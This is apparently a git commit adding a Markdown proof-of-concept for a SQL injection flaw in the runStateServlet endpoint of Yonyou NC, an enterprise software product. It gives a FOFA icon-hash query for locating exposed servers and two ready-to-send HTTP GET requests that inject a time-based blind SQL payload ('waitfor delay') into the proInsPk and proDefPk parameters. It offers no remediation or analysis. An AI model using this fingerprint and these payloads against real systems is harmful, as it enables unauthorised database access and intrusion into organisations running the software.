Create 用友NC-runStateServlet接口存在SQL注入漏洞.md
This commit is contained in:
parent
ae20bdcc60
commit
80042f9f89
30
用友NC-runStateServlet接口存在SQL注入漏洞.md
Normal file
30
用友NC-runStateServlet接口存在SQL注入漏洞.md
Normal file
@ -0,0 +1,30 @@
|
||||
## 用友NC-runStateServlet接口存在SQL注入漏洞
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
icon_hash="1085941792"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1
|
||||
Host: 192.168.63.129:8088
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||
Content-Length: 19
|
||||
|
||||
```
|
||||
|
||||
|
||||
## poc2
|
||||
```
|
||||
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1
|
||||
Host: 192.168.63.129:8088
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||
Content-Length: 19
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user